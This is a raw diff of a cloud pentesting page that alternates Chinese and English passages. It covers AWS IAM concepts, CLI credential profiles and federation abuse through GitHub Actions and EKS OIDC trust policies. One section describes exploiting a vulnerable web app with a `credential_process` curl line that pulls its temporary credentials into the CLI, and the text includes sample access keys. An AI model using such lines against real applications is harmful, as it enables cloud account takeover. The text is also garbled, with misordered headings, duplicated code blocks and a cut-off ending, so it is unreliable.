- **秘密访问密钥ID**40个随机的大小写字符S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU无法检索丢失的秘密访问密钥ID
- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
每当您需要**更改访问密钥**时,您应遵循以下过程:\
_创建一个新的访问密钥 -> 将新密钥应用于系统/应用程序 -> 将原始密钥标记为非活动 -> 测试并验证新访问密钥是否有效 -> 删除旧访问密钥_
Whenever you need to **change the Access Key** this is the process you should follow:\
_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
### MFA - 多因素身份验证
### MFA - Multi Factor Authentication
它用于**创建额外的身份验证因素**,以补充您现有的方法,例如密码,从而创建多因素身份验证级别。\
您可以使用**免费的虚拟应用程序或物理设备**。您可以使用像Google身份验证器这样的应用程序免费激活AWS中的MFA。
It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
带有MFA条件的策略可以附加到以下内容
Policies with MFA conditions can be attached to the following:
- IAM用户或组
- 资源例如Amazon S3桶、Amazon SQS队列或Amazon SNS主题
- 可以被用户假设的IAM角色的信任策略
- An IAM user or group
- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
- The trust policy of an IAM role that can be assumed by a user
If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
Note that **`AssumeRole` credentials don't contain this information**.
如果您想要**通过CLI访问**一个**检查MFA**的资源,您需要调用**`GetSessionToken`**。这将为您提供一个包含MFA信息的令牌。\
请注意,**`AssumeRole`凭据不包含此信息**。
```bash
aws sts get-session-token --serial-number <arn_device> --token-code <code>
```
如[**此处所述**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html),有很多不同的情况**无法使用MFA**。
### [IAM用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) <a href="#id_iam-groups" id="id_iam-groups"></a>
As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
IAM [用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) 是一种**一次性将策略附加到多个用户**的方法,这可以更容易地管理这些用户的权限。**角色和组不能成为组的一部分**。
### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) <a href="#id_iam-groups" id="id_iam-groups"></a>
您可以将**基于身份的策略附加到用户组**,以便用户组中的所有**用户**都**接收该策略的权限**。您**不能**在**策略**(例如基于资源的策略)中将**用户组**标识为**`Principal`**因为组与权限相关而不是身份验证主体是经过身份验证的IAM实体。
An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
以下是用户组的一些重要特征:
You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
- 一个用户**组**可以**包含多个用户**,而一个**用户**可以**属于多个组**。
- **用户组不能嵌套**;它们只能包含用户,而不能包含其他用户组。
- **没有默认的用户组会自动包含AWS账户中的所有用户**。如果您想要这样的用户组,必须创建它并将每个新用户分配给它。
- AWS账户中IAM资源的数量和大小是有限制的例如组的数量以及用户可以成为成员的组的数量。有关更多信息请参见[IAM和AWS STS配额](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html)。
Here are some important characteristics of user groups:
### [IAM角色](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) <a href="#id_iam-roles" id="id_iam-roles"></a>
- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
- **User groups can't be nested**; they can contain only users, not other user groups.
- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
IAM **角色**与**用户**非常**相似**,因为它是一个**具有权限策略的身份决定它在AWS中可以做什么和不能做什么**。然而,角色**没有任何凭证**(密码或访问密钥)与之关联。角色的设计目的是**可以被任何需要它的人(并且有足够权限)假设**。IAM用户可以假设一个角色以临时**承担特定任务的不同权限**。角色可以分配给使用外部身份提供者而不是IAM登录的[**联合用户**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html)。
### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) <a href="#id_iam-roles" id="id_iam-roles"></a>
IAM角色由**两种类型的策略**组成:**信任策略**,不能为空,定义**谁可以假设**该角色,以及**权限策略**,不能为空,定义**它可以访问什么**。
An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
#### AWS安全令牌服务STS
An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
AWS安全令牌服务STS是一个网络服务促进**临时、有限权限凭证的发放**。它专门用于:
#### AWS Security Token Service (STS)
### [IAM中的临时凭证](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) <a href="#id_temp-creds" id="id_temp-creds"></a>
AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
**临时凭证主要与IAM角色一起使用**但也有其他用途。您可以请求具有比标准IAM用户更有限权限集的临时凭证。这**防止**您**意外执行不被更有限凭证允许的任务**。临时凭证的一个好处是它们在设定的时间段后会自动过期。您可以控制凭证的有效期。
### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) <a href="#id_temp-creds" id="id_temp-creds"></a>
### 策略
**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
#### 策略权限
### Policies
用于分配权限。有两种类型:
#### Policy Permissions
- AWS管理策略由AWS预配置
- 客户管理策略由您配置。您可以基于AWS管理策略创建策略修改其中一个并创建自己的使用策略生成器一个帮助您授予和拒绝权限的GUI视图或编写自己的策略。
Are used to assign permissions. There are 2 types:
- AWS managed policies (preconfigured by AWS)
- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
By **default access** is **denied**, access will be granted if an explicit role has been specified.\
If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
默认情况下,访问**被拒绝**,如果指定了明确的角色,则将授予访问权限。\
如果**存在单个“拒绝”**它将覆盖“允许”但AWS账户的根安全凭证的请求默认允许除外。
```javascript
{
"Version": "2012-10-17", //Version of the policy
"Statement": [ //Main element, there can be more than 1 entry in this array
{
"Sid": "Stmt32894y234276923" //Unique identifier (optional)
"Effect": "Allow", //Allow or deny
"Action": [ //Actions that will be allowed or denied
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //Resource the action and effect will be applied to
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Optional element that allow to control when the permission will be effective
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
"Version": "2012-10-17", //Version of the policy
"Statement": [ //Main element, there can be more than 1 entry in this array
{
"Sid": "Stmt32894y234276923" //Unique identifier (optional)
"Effect": "Allow", //Allow or deny
"Action": [ //Actions that will be allowed or denied
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //Resource the action and effect will be applied to
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Optional element that allow to control when the permission will be effective
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
```
[可以在任何服务中用于条件的全局字段在这里记录](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount)。\
[每个服务中可以用于条件的特定字段在这里记录](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html)。
#### 内联策略
The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
这种策略是**直接分配**给用户、组或角色的。因此,它们不会出现在策略列表中,因为其他任何人都可以使用它们。\
内联策略在您想要**保持策略与应用于的身份之间的严格一对一关系**时非常有用。例如您希望确保策略中的权限不会意外分配给除其预期身份以外的身份。当您使用内联策略时策略中的权限不能意外附加到错误的身份。此外当您使用AWS管理控制台删除该身份时嵌入在身份中的策略也会被删除。这是因为它们是主体实体的一部分。
#### Inline Policies
#### 资源桶策略
This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\
Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
这些是可以在**资源**中定义的**策略**。**并非所有AWS资源都支持它们**。
#### Resource Bucket Policies
如果主体没有对它们的明确拒绝,并且资源策略授予它们访问权限,则允许它们。
These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**.
### IAM边界
If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
IAM边界可以用来**限制用户或角色应有的访问权限**。这样,即使通过**不同的策略**授予用户一组不同的权限,如果他尝试使用它们,操作将**失败**。
### IAM Boundaries
边界只是附加到用户的策略,**指示用户或角色可以拥有的最大权限级别**。因此,**即使用户具有管理员访问权限**如果边界指示他只能读取S·桶那就是他能做的最大事情。
IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them.
**这**、**SCPs**和**遵循最小权限**原则是控制用户权限不超过其所需权限的方式。
A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do.
### 会话策略
**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs.
会话策略是**在角色被假定时设置的策略**。这将类似于该会话的**IAM边界**:这意味着会话策略不授予权限,而是**将权限限制为策略中指示的权限**(最大权限为角色所拥有的权限)。
### Session Policies
A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
This is useful for **security measures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
这对于**安全措施**非常有用:当管理员要假定一个特权很高的角色时,他可以将权限限制为会话策略中指示的权限,以防会话被破坏。
```bash
aws sts assume-role \
--role-arn <value> \
--role-session-name <value> \
[--policy-arns <arn_custom_policy1> <arn_custom_policy2>]
[--policy <file://policy.json>]
--role-arn <value> \
--role-session-name <value> \
[--policy-arns <arn_custom_policy1> <arn_custom_policy2>]
[--policy <file://policy.json>]
```
注意,默认情况下,**AWS 可能会将会话策略添加到即将生成的会话中**,这是由于其他原因。例如,在[未经身份验证的 Cognito 假定角色](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles)中默认情况下使用增强身份验证AWS 将生成**带有会话策略的会话凭证**,该策略限制会话可以访问的服务[**为以下列表**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)。
因此,如果在某个时刻你遇到错误“...因为没有会话策略允许...”,而角色有权限执行该操作,那是因为**有一个会话策略阻止了它**。
Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
### 身份联合
Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
身份联合**允许来自外部身份提供者的用户**安全地访问 AWS 资源,而无需提供有效 IAM 用户帐户的 AWS 用户凭证。\
身份提供者的一个例子可以是你自己的企业**Microsoft Active Directory**(通过**SAML**)或**OpenID**服务(如**Google**)。联合访问将允许其中的用户访问 AWS。
### Identity Federation
要配置这种信任,生成一个**IAM 身份提供者SAML 或 OAuth**,该提供者将**信任****其他平台**。然后,至少一个**IAM 角色被分配(信任)给身份提供者**。如果来自受信任平台的用户访问 AWS他将以提到的角色进行访问。
Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
然而,通常你会希望根据第三方平台中用户的**组别给予不同的角色**。然后,多个**IAM 角色可以信任**第三方身份提供者,第三方平台将允许用户假定一个角色或另一个角色。
To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role.
However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
<figure><img src="../../../images/image (247).png" alt=""><figcaption></figcaption></figure>
### IAM 身份中心
### IAM Identity Center
AWS IAM 身份中心AWS 单点登录的继任者)扩展了 AWS 身份和访问管理IAM的功能提供一个**集中位置**,将**用户及其对 AWS** 账户和云应用程序的访问管理汇集在一起。
AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications.
登录域将类似于 `<user_input>.awsapps.com`
The login domain is going to be something like `<user_input>.awsapps.com`.
要登录用户,可以使用 3 个身份源:
To login users, there are 3 identity sources that can be used:
- 身份中心目录:常规 AWS 用户
- Active Directory:支持不同的连接器
- 外部身份提供者所有用户和组来自外部身份提供者IdP
- Identity Center Directory: Regular AWS users
- Active Directory: Supports different connectors
- External Identity Provider: All users and groups come from an external Identity Provider (IdP)
<figure><img src="../../../images/image (279).png" alt=""><figcaption></figcaption></figure>
在身份中心目录的最简单情况下,**身份中心将拥有用户和组的列表**,并能够**为他们分配策略**到**组织的任何账户**。
In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
为了给身份中心用户/组访问一个账户,将创建一个**信任身份中心的 SAML 身份提供者**,并在目标账户中创建一个**信任身份提供者并带有指示策略的角色**。
In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
#### AwsSSOInlinePolicy
可以通过**内联策略向通过 IAM 身份中心创建的角色授予权限**。在被授予**AWS 身份中心内联策略**的账户中创建的角色将具有名为**`AwsSSOInlinePolicy`**的内联策略中的这些权限。
It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
因此,即使你看到两个带有名为**`AwsSSOInlinePolicy`**的内联策略的角色,也**并不意味着它们具有相同的权限**。
Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**.
### 跨账户信任和角色
### Cross Account Trusts and Roles
**用户**(信任)可以创建一个带有某些策略的跨账户角色,然后**允许另一个用户**(受信任)**访问他的账户**,但仅限于**新角色策略中指示的访问权限**。要创建此角色,只需创建一个新角色并选择跨账户角色。跨账户访问角色提供两个选项。提供你拥有的 AWS 账户之间的访问,以及提供你拥有的账户与第三方 AWS 账户之间的访问。\
建议**指定被信任的用户,而不是放置一些通用内容**,因为如果不这样做,其他经过身份验证的用户(如联合用户)也可能滥用此信任。
**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
### AWS Simple AD
不支持:
Not supported:
- 信任关系
- AD 管理中心
- 完整的 PS API 支持
- AD 回收站
- 组托管服务账户
- 架构扩展
- 无法直接访问操作系统或实例
- Trust Relations
- AD Admin Center
- Full PS API support
- AD Recycle Bin
- Group Managed Service Accounts
- Schema Extensions
- No Direct access to OS or Instances
#### Web 联合或 OpenID 身份验证
#### Web Federation or OpenID Authentication
该应用程序使用 AssumeRoleWithWebIdentity 创建临时凭证。然而,这并不授予访问 AWS 控制台的权限,仅授予对 AWS 内部资源的访问。
The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
### 其他 IAM 选项
### Other IAM options
- 你可以**设置密码策略设置**选项,如最小长度和密码要求。
- 你可以**下载“凭证报告”**,其中包含有关当前凭证的信息(如用户创建时间、密码是否启用等)。你可以每**四小时**生成一次凭证报告。
- You can **set a password policy setting** options like minimum length and password requirements.
- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
AWS 身份和访问管理IAM提供**细粒度的访问控制**,覆盖所有 AWS。使用 IAM你可以指定**谁可以访问哪些服务和资源**,以及在什么条件下。通过 IAM 策略,你管理对你的员工和系统的权限,以**确保最小权限**。
AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
### IAM ID 前缀
### IAM ID Prefixes
[**此页面**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids)中,你可以找到根据其性质的键的**IAM ID 前缀**
In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
| 标识符代码 | 描述 |
| Identifier Code | Description |
| --------------- | ----------------------------------------------------------------------------------------------------------- |
| ABIA | [AWS STS 服务承载令牌](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ACCA | 上下文特定凭证 |
| AGPA | 用户组 |
| AIDA | IAM 用户 |
| AIPA | Amazon EC2 实例配置文件 |
| AKIA | 访问密钥 |
| ANPA | 管理策略 |
| ANVA | 管理策略中的版本 |
| APKA | 公钥 |
| AROA | 角色 |
| ASCA | 证书 |
| ASIA | [临时AWS STS访问密钥 ID](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) 使用此前缀,但仅在与秘密访问密钥和会话令牌组合时是唯一的。 |
| ACCA | Context-specific credential |
| AGPA | User group |
| AIDA | IAM user |
| AIPA | Amazon EC2 instance profile |
| AKIA | Access key |
| ANPA | Managed policy |
| ANVA | Version in a managed policy |
| APKA | Public key |
| AROA | Role |
| ASCA | Certificate |
| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
### 审计账户的推荐权限
### Recommended permissions to audit accounts
以下权限授予各种元数据的读取访问:
The following privileges grant various read access of metadata:
- `arn:aws:iam::aws:policy/SecurityAudit`
- `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
@@ -342,13 +356,14 @@ AWS 身份和访问管理IAM提供**细粒度的访问控制**,覆盖所
- `directconnect:DescribeConnections`
- `dynamodb:ListTables`
## 杂项
## Misc
### CLI 身份验证
### CLI Authentication
In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
Example of credentials file with more than 1 profile:
为了让常规用户通过 CLI 认证到 AWS你需要有**本地凭证**。默认情况下,你可以在 `~/.aws/credentials` 中**手动**配置它们,或通过**运行** `aws configure`。\
在该文件中,你可以有多个配置文件,如果使用**aws cli**时**未指定配置文件**,则将使用该文件中名为**`[default]`**的配置文件。\
带有多个配置文件的凭证文件示例:
```
[default]
aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
@@ -359,10 +374,12 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT
aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
region = eu-west-2
```
如果您需要访问**不同的AWS账户**,并且您的配置文件被授予访问**在这些账户内假设角色**的权限您就不需要每次手动调用STS`aws sts assume-role --role-arn <role-arn> --role-session-name sessname`)并配置凭证。
您可以使用`~/.aws/config`文件来[**指示要假设的角色**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html),然后像往常一样使用`--profile`参数(`assume-role`将以透明的方式为用户执行)。\
配置文件示例:
If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn <role-arn> --role-session-name sessname`) and configure the credentials.
You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
A config file example:
```
[profile acc2]
region=eu-west-2
@@ -371,30 +388,36 @@ role_session_name = <session_name>
source_profile = <profile_with_assume_role>
sts_regional_endpoints = regional
```
使用此配置文件,您可以像这样使用 aws cli
With this config file you can then use aws cli like:
```
aws --profile acc2 ...
```
如果您正在寻找类似的东西,但针对**浏览器**,您可以查看**扩展** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en)。
#### 自动化临时凭证
If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
#### Automating temporary credentials
If you are exploiting an application which generates temporary credentials, it can be tedious updating them in your terminal every few minutes when they expire. This can be fixed using a `credential_process` directive in the config file. For example, if you have some vulnerable webapp, you could do:
如果您正在利用一个生成临时凭证的应用程序,每隔几分钟在终端中更新它们可能会很麻烦。可以通过在配置文件中使用 `credential_process` 指令来解决此问题。例如,如果您有一些易受攻击的网络应用程序,您可以这样做:
```toml
[victim]
credential_process = curl -d 'PAYLOAD' https://some-site.com
```
请注意,凭据 _必须_ 以以下格式返回到 STDOUT
Note that credentials _must_ be returned to STDOUT in the following format:
```json
{
"Version": 1,
"AccessKeyId": "an AWS access key",
"SecretAccessKey": "your AWS secret access key",
"SessionToken": "the AWS session token for temporary credentials",
"Expiration": "ISO8601 timestamp when the credentials expire"
}
"Version": 1,
"AccessKeyId": "an AWS access key",
"SecretAccessKey": "your AWS secret access key",
"SessionToken": "the AWS session token for temporary credentials",
"Expiration": "ISO8601 timestamp when the credentials expire"
}
```
## 参考
## References
- [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
- [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)

View File

@@ -1,84 +1,87 @@
# AWS - 联邦滥用
# AWS - Federation Abuse
{{#include ../../../banners/hacktricks-training.md}}
## SAML
有关 SAML 的信息,请查看:
For info about SAML please check:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/saml-attacks/index.html
{{#endref}}
为了通过 SAML 配置 **身份联邦**,您只需提供一个 **名称** 和包含所有 SAML 配置的 **元数据 XML****端点****带有公钥的证书**
In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key)
## OIDC - Github Actions 滥用
## OIDC - Github Actions Abuse
为了将 github action 添加为身份提供者:
In order to add a github action as Identity provider:
1. For _Provider type_, select **OpenID Connect**.
2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
3. Click on _Get thumbprint_ to get the thumbprint of the provider
4. For _Audience_, enter `sts.amazonaws.com`
5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like:
- ```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:sub": [
"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
],
"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
}
}
}
]
}
```
6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**.
7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
8. Finally use a github action to configure the AWS creds to be used by the workflow:
1. 对于 _提供者类型_,选择 **OpenID Connect**
2. 对于 _提供者 URL_,输入 `https://token.actions.githubusercontent.com`
3. 点击 _获取指纹_ 以获取提供者的指纹
4. 对于 _受众_,输入 `sts.amazonaws.com`
5. 创建一个具有 github action 所需的 **权限** 和信任提供者的 **信任策略****新角色**,例如:
- ```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:sub": [
"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
],
"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
}
}
}
]
}
```
6. 请注意在前面的策略中,只有 **组织** 的 **存储库** 中的一个 **分支** 被授权具有特定的 **触发器**。
7. github action 将能够 **冒充** 的 **角色** 的 **ARN** 将是 github action 需要知道的“秘密”,因此 **将其存储** 在 **环境** 中的 **秘密** 内。
8. 最后,使用 github action 配置工作流将使用的 AWS 凭据:
```yaml
name: "test AWS Access"
# The workflow should only trigger on pull requests to the main branch
on:
pull_request:
branches:
- main
pull_request:
branches:
- main
# Required to get the ID Token that will be used for OIDC
permissions:
id-token: write
contents: read # needed for private repos to checkout
id-token: write
contents: read # needed for private repos to checkout
jobs:
aws:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
aws:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
- name: Configure AWS Credentials
uses: aws-actions/configure-aws-credentials@v1
with:
aws-region: eu-west-1
role-to-assume:${{ secrets.READ_ROLE }}
role-session-name: OIDCSession
- name: Configure AWS Credentials
uses: aws-actions/configure-aws-credentials@v1
with:
aws-region: eu-west-1
role-to-assume:${{ secrets.READ_ROLE }}
role-session-name: OIDCSession
- run: aws sts get-caller-identity
shell: bash
- run: aws sts get-caller-identity
shell: bash
```
## OIDC - EKS 滥用
## OIDC - EKS Abuse
```bash
# Crate an EKS cluster (~10min)
eksctl create cluster --name demo --fargate
@@ -88,34 +91,43 @@ eksctl create cluster --name demo --fargate
# Create an Identity Provider for an EKS cluster
eksctl utils associate-iam-oidc-provider --cluster Testing --approve
```
可以通过将集群的 **OIDC URL** 设置为 **新的 Open ID 身份提供者****EKS** 集群中生成 **OIDC 提供者**。这是一个常见的默认策略:
It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
}
}
}
]
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
